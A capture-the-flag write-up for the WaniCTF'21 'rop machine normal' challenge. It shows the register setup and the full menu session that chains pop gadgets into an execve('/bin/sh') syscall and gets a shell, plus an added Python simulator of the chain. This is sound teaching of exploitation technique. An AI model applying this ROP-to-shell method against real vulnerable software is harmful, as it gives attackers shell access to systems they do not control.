WaniCTF'21-spring pwn 04 rop machine normal Writeup
Problem
```
# ./pwn04
"/bin/sh" address is 0x404070
[menu]
1. append hex value
2. append "pop rdi; ret" addr
3. append "pop rsi; ret" addr
4. append "pop rdx; ret" addr
5. append "pop rax; ret" addr
6. append "syscall; ret" addr
8. show menu (this one)
9. show rop_arena
0. execute rop
```
Since a "syscall; ret" gadget is provided, the intended goal is to call execve("/bin/sh", NULL, NULL).
This is essentially a knowledge check: do you know which register values the x86-64 kernel expects when control reaches the syscall instruction?
| Register | Value |
|---|---|
| RDI | address of "/bin/sh" |
| RSI | 0x0 |
| RDX | 0x0 |
| RAX | 0x3b (59, execve) |
Walkthrough
```
# ./pwn04
"/bin/sh" address is 0x404070
[menu]
1. append hex value
2. append "pop rdi; ret" addr
3. append "pop rsi; ret" addr
4. append "pop rdx; ret" addr
5. append "pop rax; ret" addr
6. append "syscall; ret" addr
8. show menu (this one)
9. show rop_arena
0. execute rop
> 2
"pop rdi; ret" is appended
> 1
hex value?: 404070
0x0000000000404070 is appended
> 3
"pop rsi; ret" is appended
> 1
hex value?: 0
0x0000000000000000 is appended
> 4
"pop rdx; ret" is appended
> 1
hex value?: 0
0x0000000000000000 is appended
> 5
"pop rax; ret" is appended
> 1
hex value?: 3b
0x000000000000003b is appended
> 6
"syscall; ret" is appended
> 9
rop_arena
+--------------------+
| pop rdi; ret       |<- rop start
+--------------------+
| 0x0000000000404070 |
+--------------------+
| pop rsi; ret       |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rdx; ret       |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rax; ret       |
+--------------------+
| 0x000000000000003b |
+--------------------+
| syscall; ret       |
+--------------------+
> 0
rop_arena
+--------------------+
| pop rdi; ret       |<- rop start
+--------------------+
| 0x0000000000404070 |
+--------------------+
| pop rsi; ret       |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rdx; ret       |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rax; ret       |
+--------------------+
| 0x000000000000003b |
+--------------------+
| syscall; ret       |
+--------------------+
# ls
peda-session-pwn02.txt pwn02 pwn02.c pwn02.py pwn03 pwn03.c pwn03.py pwn04 pwn04.c
```
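To make the register-convention point concrete, here is an added example (my own code, not from the original writeup or the challenge binary): a small simulator of the "rop machine" that replays the menu inputs above into an arena, steps through it the way ret-driven execution does (each "pop REG; ret" consumes the next 8-byte word), and checks whether the state at "syscall; ret" is execve("/bin/sh", NULL, NULL). The gadget addresses are constructed placeholders; only 0x404070 comes from the challenge output.

```python
# Added example, not from the original writeup: a simulator of the challenge's
# "rop machine". It replays menu inputs into a rop_arena, then steps through
# it as ret-driven execution would (each "pop REG; ret" consumes the next
# 8-byte word) and reports the registers at "syscall; ret". Gadget addresses
# are constructed placeholders; only 0x404070 ("/bin/sh") is from the page.
BIN_SH = 0x404070
SYS_EXECVE = 0x3B  # x86-64 syscall number 59

GADGETS = {  # menu choice -> (gadget, placeholder address)
    2: ("pop rdi; ret", 0x401000), 3: ("pop rsi; ret", 0x401002),
    4: ("pop rdx; ret", 0x401004), 5: ("pop rax; ret", 0x401006),
    6: ("syscall; ret", 0x401008),
}
ADDR_TO_GADGET = {addr: name for name, addr in GADGETS.values()}

def build_arena(menu_inputs):
    """Replay (choice, hex_string_or_None) pairs into a list of 64-bit words."""
    arena = []
    for choice, value in menu_inputs:
        if choice == 1:                 # "append hex value"
            arena.append(int(value, 16) & 0xFFFFFFFFFFFFFFFF)
        elif choice in GADGETS:         # "append ... addr"
            arena.append(GADGETS[choice][1])
        else:
            raise ValueError(f"unsupported menu choice {choice}")
    return arena

def run_arena(arena):
    """Execute the chain; return the registers at the first syscall gadget."""
    regs = {"rax": None, "rdi": None, "rsi": None, "rdx": None}
    rsp = 0                             # index of the word 'ret' will pop next
    while rsp < len(arena):
        gadget = ADDR_TO_GADGET.get(arena[rsp])
        rsp += 1                        # 'ret' consumed the gadget address
        if gadget is None:
            raise RuntimeError("ret into a non-gadget word: chain misaligned")
        if gadget == "syscall; ret":
            return regs
        if rsp >= len(arena):
            raise RuntimeError("pop gadget has no value word after it")
        regs[gadget.split()[1].rstrip(";")] = arena[rsp]  # pop takes next word
        rsp += 1
    raise RuntimeError("chain ended without reaching syscall")

def is_execve_shell(regs):
    return regs == {"rax": SYS_EXECVE, "rdi": BIN_SH, "rsi": 0, "rdx": 0}

# Exactly the menu sequence typed in the walkthrough above.
WRITEUP_INPUTS = [(2, None), (1, "404070"), (3, None), (1, "0"), (4, None),
                  (1, "0"), (5, None), (1, "3b"), (6, None)]
```

Dropping any one value word (for example the 0 after "pop rsi; ret") shifts every later word by one slot, and the simulator reports the misalignment instead of a shell; that is the same failure a real chain would hit.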
Author and source
Original article: https://qiita.com/housu_jp/items/c558dcac8b5c5bd66d27 (the original author's details are on that page; copyright belongs to the original author).